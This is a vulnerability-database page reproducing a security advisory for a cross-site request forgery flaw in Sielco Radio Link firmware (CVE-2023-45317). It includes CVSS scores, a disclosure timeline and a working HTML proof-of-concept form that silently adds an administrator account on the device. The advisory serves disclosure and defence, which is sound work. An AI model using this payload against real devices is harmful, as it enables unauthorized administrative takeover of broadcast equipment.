Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2023-5761
HistoryMar 30, 2023 - 12:00 a.m.

Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)

2023-03-3000:00:00
Gjoko Krstic
zeroscience.mk
164
sielco
radio link
cross-site request forgery
add admin
http requests
vulnerability
csrf
gjoko krstic
packet storm security
cisa
ibm x-force
nvd
cve
zero science lab

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.6 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

24.3%

JSON

Title: Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)
Advisory ID: ZSL-2023-5761
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 30.03.2023

Summary

Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.

Description

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)

Tested On

lwIP/2.1.1
Web/2.9.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[29.03.2023] No response from the vendor.
[29.03.2023] No response from the CSIRT team.
[30.03.2023] Public security advisory released.

PoC

sielco_rl_csrf.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/171846/&gt;
[2] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08&gt;
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253071&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269707&gt;
[5] <https://nvd.nist.gov/vuln/detail/CVE-2023-45317&gt;
[6] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-45317&gt;

Changelog

[30.03.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5] and [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--


Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
                  2.05 (RTX19)
                  2.00 (EXC19)
                  1.60 (RTX19)
                  1.59 (RTX19)
                  1.55 (EXC19)

Summary: Sielco develops and produces radio links for all
transmission and reception needs, thanks to innovative units
and excellent performances, accompanied by a high reliability
and low consumption.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: lwIP/2.1.1
           Web/2.9.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5761
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5761.php


26.01.2023

--><html><body><p>CSRF Add Admin:
---------------


  </p>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value="Reader"/>
<input name="pwd1" type="hidden" value="123456"/>
<input name="pwd1bis" type="hidden" value="123456"/>
<input name="auth1" type="hidden" value="2"/>
<input name="user2" type="hidden" value=""/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value="0"/>
<input name="user3" type="hidden" value=""/>
<input name="pwd3" type="hidden" value=""/>
<input name="pwd3bis" type="hidden" value=""/>
<input name="auth3" type="hidden" value="0"/>
<input type="submit" value="Adminize Me!"/>
</form>
</body></html>

Related

prion 1
cvelist 1
nvd 1
zeroscience 1
cve 1
ics 1
prion
prion
Code injection
2023-10-26 17:15:00
cvelist
cvelist
CVE-2023-45317 Sielco Radio Link and Analog FM Transmitters Cross-Site Request Forgery
2023-10-26 16:17:37
nvd
nvd
CVE-2023-45317
2023-10-26 17:15:09
zeroscience
zeroscience
Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
2023-03-28 00:00:00
cve
cve
CVE-2023-45317
2023-10-26 17:15:09
ics
ics
Sielco Radio Link and Analog FM Transmitters
2023-10-26 12:00:00

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.6 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

24.3%

JSON
Related for ZSL-2023-5761
prion1cvelist1nvd1zeroscience1cve1ics1